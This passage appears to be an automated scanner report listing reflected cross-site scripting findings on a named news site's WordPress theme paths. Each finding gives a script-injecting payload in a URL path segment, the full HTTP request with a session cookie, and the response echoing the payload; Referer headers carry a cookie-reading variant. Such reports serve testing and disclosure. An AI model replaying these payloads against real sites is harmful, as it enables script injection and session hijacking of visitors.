This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox/facebox.css87596"><script>alert(1)</script>4c535a121ba HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox/facebox.css87596\"><script>alert(1)</script>4c535a121ba'; }); return true;" >
...[SNIP]...

4.326. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f38a4"><script>alert(1)</script>d37d4df7c69 was submitted in the REST URL parameter 1. This input was echoed as f38a4\"><script>alert(1)</script>d37d4df7c69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf38a4"><script>alert(1)</script>d37d4df7c69/themes/shadow/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:06:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:06:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:06:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentf38a4\"><script>alert(1)</script>d37d4df7c69/themes/shadow/facebox/facebox.js'; }); return true;" >
...[SNIP]...

4.327. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a138e"><script>alert(1)</script>60422d391c9 was submitted in the REST URL parameter 2. This input was echoed as a138e\"><script>alert(1)</script>60422d391c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesa138e"><script>alert(1)</script>60422d391c9/shadow/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themesa138e\"><script>alert(1)</script>60422d391c9/shadow/facebox/facebox.js'; }); return true;" >
...[SNIP]...

4.328. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7308c"><script>alert(1)</script>3ee816aebbb was submitted in the REST URL parameter 3. This input was echoed as 7308c\"><script>alert(1)</script>3ee816aebbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow7308c"><script>alert(1)</script>3ee816aebbb/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow7308c\"><script>alert(1)</script>3ee816aebbb/facebox/facebox.js'; }); return true;" >
...[SNIP]...

4.329. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd045"><script>alert(1)</script>17569ef3f76 was submitted in the REST URL parameter 4. This input was echoed as cd045\"><script>alert(1)</script>17569ef3f76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/faceboxcd045"><script>alert(1)</script>17569ef3f76/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:35 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/faceboxcd045\"><script>alert(1)</script>17569ef3f76/facebox.js'; }); return true;" >
...[SNIP]...

4.330. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a09c"><script>alert(1)</script>407fb9720e3 was submitted in the REST URL parameter 5. This input was echoed as 3a09c\"><script>alert(1)</script>407fb9720e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox/facebox.js3a09c"><script>alert(1)</script>407fb9720e3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox/facebox.js3a09c\"><script>alert(1)</script>407fb9720e3'; }); return true;" >
...[SNIP]...

4.331. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a52"><script>alert(1)</script>839a7f7b5f4 was submitted in the REST URL parameter 1. This input was echoed as 97a52\"><script>alert(1)</script>839a7f7b5f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content97a52"><script>alert(1)</script>839a7f7b5f4/themes/shadow/facebox/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content97a52\"><script>alert(1)</script>839a7f7b5f4/themes/shadow/facebox/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.332. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c5b"><script>alert(1)</script>931c5c5546f was submitted in the REST URL parameter 2. This input was echoed as a4c5b\"><script>alert(1)</script>931c5c5546f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesa4c5b"><script>alert(1)</script>931c5c5546f/shadow/facebox/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:41 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themesa4c5b\"><script>alert(1)</script>931c5c5546f/shadow/facebox/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.333. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9f02"><script>alert(1)</script>494bbf461e3 was submitted in the REST URL parameter 3. This input was echoed as f9f02\"><script>alert(1)</script>494bbf461e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadowf9f02"><script>alert(1)</script>494bbf461e3/facebox/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:17 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadowf9f02\"><script>alert(1)</script>494bbf461e3/facebox/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.334. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298fa"><script>alert(1)</script>096af0f6e63 was submitted in the REST URL parameter 4. This input was echoed as 298fa\"><script>alert(1)</script>096af0f6e63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox298fa"><script>alert(1)</script>096af0f6e63/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox298fa\"><script>alert(1)</script>096af0f6e63/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.335. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b148c"><script>alert(1)</script>ed01bd5fa24 was submitted in the REST URL parameter 5. This input was echoed as b148c\"><script>alert(1)</script>ed01bd5fa24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox/jquery-1.2.2.pack.jsb148c"><script>alert(1)</script>ed01bd5fa24 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.jsb148c\"><script>alert(1)</script>ed01bd5fa24'; }); return true;" >
...[SNIP]...

4.336. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6f3d"><script>alert(1)</script>b31a84a4f19 was submitted in the REST URL parameter 1. This input was echoed as d6f3d\"><script>alert(1)</script>b31a84a4f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd6f3d"><script>alert(1)</script>b31a84a4f19/themes/shadow/iepngfix.htc HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:53:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:53:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:53:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentd6f3d\"><script>alert(1)</script>b31a84a4f19/themes/shadow/iepngfix.htc'; }); return true;" >
...[SNIP]...

